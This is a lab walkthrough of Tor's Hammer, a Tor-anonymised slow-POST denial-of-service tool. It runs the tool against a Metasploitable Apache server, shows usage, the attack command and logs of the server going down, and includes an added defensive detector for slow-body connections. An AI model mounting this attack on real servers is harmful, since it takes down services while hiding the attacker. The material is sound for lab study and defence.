Tors Hammer
From charlesreid1
Tor's Hammer is a Python script for creating denial of service attacks on websites. It is designed to be used through the Tor traffic anonymization tool.
Tor's Hammer Slow Body DoS Attack
Tor's Hammer (https://sourceforge.net/projects/torshammer/) is a tool that uses the slow body attack to swamp Apache servers and cause a denial of service (DoS). It does this by sending a POST request with a large declared Content-Length (like 1000 MB), then repeating the following ad infinitum: send one letter through the open connection; take a nap.
Tor's Hammer, in particular, provides a Python script that enables running the slow body attack through a web proxy like Tor, to provide anonymity. It also implements other disguising elements like a slew of User Agent headers.
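Because the traffic is proxied and the User Agent varies, a server-side check has to key on how each connection behaves: a large declared Content-Length with body bytes arriving at a trickle. The following is an added example, not code from the original page or from the Tor's Hammer project; the record fields, thresholds, addresses and sample connections are constructed assumptions.

```python
from dataclasses import dataclass

# One snapshot per in-flight POST (hypothetical monitor record, not an Apache log format).
@dataclass
class PostConn:
    conn_id: str
    src: str
    user_agent: str
    content_length: int  # bytes declared in the Content-Length header
    body_received: int   # body bytes read so far
    age_s: float         # seconds since the request headers completed

# Assumed thresholds; tune to the slowest legitimate uploader you must support.
MIN_RATE = 500     # bytes/second
GRACE_S = 20       # seconds before the rate is judged
MAX_WORKERS = 150  # worker slots on the monitored server

def is_slow_body(c: PostConn) -> bool:
    """Past the grace period, still owing body bytes, and arriving below MIN_RATE."""
    if c.age_s <= GRACE_S or c.body_received >= c.content_length:
        return False
    return c.body_received / c.age_s < MIN_RATE

def eta_seconds(c: PostConn) -> float:
    """How long the worker stays occupied if the observed rate continues."""
    rate = c.body_received / c.age_s
    remaining = c.content_length - c.body_received
    return float("inf") if rate == 0 else remaining / rate

def assess(conns):
    """Summarise stalled POSTs; keyed on connection behaviour, not source or User-Agent."""
    slow = [c for c in conns if is_slow_body(c)]
    return {
        "slow_ids": sorted(c.conn_id for c in slow),
        "worker_share": len(slow) / MAX_WORKERS,
        "distinct_sources": len({c.src for c in slow}),
        "distinct_agents": len({c.user_agent for c in slow}),
    }

# Constructed sample data (documentation-range addresses, placeholder agents).
SAMPLES = [
    PostConn("c1", "198.51.100.7", "UA-A", 1_000_000_000, 60, 60.0),   # 1 B/s trickle
    PostConn("c2", "203.0.113.9", "UA-B", 1_000_000_000, 45, 90.0),    # 0.5 B/s trickle
    PostConn("c3", "192.0.2.14", "UA-C", 5_000_000, 4_000_000, 30.0),  # ordinary upload
    PostConn("c4", "192.0.2.15", "UA-D", 2_000, 0, 5.0),               # still in grace period
    PostConn("c5", "203.0.113.77", "UA-E", 1_000_000_000, 0, 40.0),    # headers only, no body yet
]
if __name__ == "__main__":
    print(assess(SAMPLES))
```

In the sample, every stalled connection has a different source and agent, so a per-address or per-agent rule would see nothing unusual while the rate check flags all three.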
We'll test this tool out on the Metasploitable machine, which is running Apache 2.2.8, and see if it is vulnerable to the Tor's Hammer DoS attack. If so, we'll mount the attack.
NOTE: This will completely knock out the target server. The web server will run out of memory and will begin to drop packets from the device. It must be rebooted to fix. Use wisely.
Python Script
To run this attack, use the torshammer.py script from the link above.
$ python torshammer.py

/*
 * Tor's Hammer
 * Slow POST DoS Testing Tool
 * Version 1.0 Beta
 * Anon-ymized via Tor
 */
./torshammer.py -t <target> [-r <threads> -p <port> -T -h]
 -t|--target <Hostname|IP>
 -r|--threads <Number of threads> Defaults to 256
 -p|--port <Web Server Port> Defaults to 80
 -T|--tor Enable anonymising through tor on 127.0.0.1:9050
 -h|--help Shows this help

Eg. ./torshammer.py -t 192.168.1.100 -r 256
Run this against the IP address of the Metasploitable machine, 10.0.0.27:
# python torshammer.py -t 10.0.0.27
This will run with the default number of threads (256).
Results
This works like a charm, bringing the target 10.0.0.27 to its knees:
Bingo!
Note that there are a large number of errors printed:

error: [Errno 24] Too many open files

Thread broken, restarting...
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner
  File "torshammer.py", line 112, in run
  File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__
error: [Errno 24] Too many open files

Thread broken, restarting...
Exception in thread Thread-65:
Traceback (most recent call last):
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner
  File "torshammer.py", line 112, in run
  File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__
error: [Errno 24] Too many open files

Thread broken, restarting...
Exception in thread Thread-17:
Traceback (most recent call last):
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner
  File "torshammer.py", line 112, in run
  File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__
However, these don't seem to affect the attack, as the web server is inaccessible even while the error messages are being printed out.
Bringing Down The Server
Ping Down
At some point during the attack, the machine stopped responding to ping:
ping: sendto: Host is down
Request timeout for icmp_seq 874
ping: sendto: Host is down
Request timeout for icmp_seq 875
ping: sendto: Host is down
Request timeout for icmp_seq 876
ping: sendto: Host is down
Request timeout for icmp_seq 877
ping: sendto: Host is down
Request timeout for icmp_seq 878
ping: sendto: Host is down
Request timeout for icmp_seq 879
ping: sendto: Host is down
Request timeout for icmp_seq 880
ping: sendto: Host is down
Request timeout for icmp_seq 881
ping: sendto: Host is down
Request timeout for icmp_seq 882
ping: sendto: Host is down
Request timeout for icmp_seq 883
ping: sendto: Host is down
Request timeout for icmp_seq 884
ping: sendto: Host is down
Request timeout for icmp_seq 885
ping: sendto: Host is down
Request timeout for icmp_seq 886
ping: sendto: Host is down
Request timeout for icmp_seq 887
ping: sendto: Host is down
Request timeout for icmp_seq 888
ping: sendto: Host is down
Request timeout for icmp_seq 889
ping: sendto: Host is down
Request timeout for icmp_seq 890
ping: sendto: Host is down
Request timeout for icmp_seq 891
ping: sendto: Host is down
Request timeout for icmp_seq 892
Request timeout for icmp_seq 893
Request timeout for icmp_seq 894
Request timeout for icmp_seq 895
Request timeout for icmp_seq 896
Request timeout for icmp_seq 897
Request timeout for icmp_seq 898
Request timeout for icmp_seq 899
Request timeout for icmp_seq 900
Request timeout for icmp_seq 901
Request timeout for icmp_seq 902
Request timeout for icmp_seq 903
Request timeout for icmp_seq 904
Request timeout for icmp_seq 905
Request timeout for icmp_seq 906
Request timeout for icmp_seq 907
Memory Squeeze
Turns out, the machine ran out of memory, and the network device began dropping packets:
This attack completely knocked the server offline, and it had to be rebooted.
pwn
To be sure: this attack can pwn a server.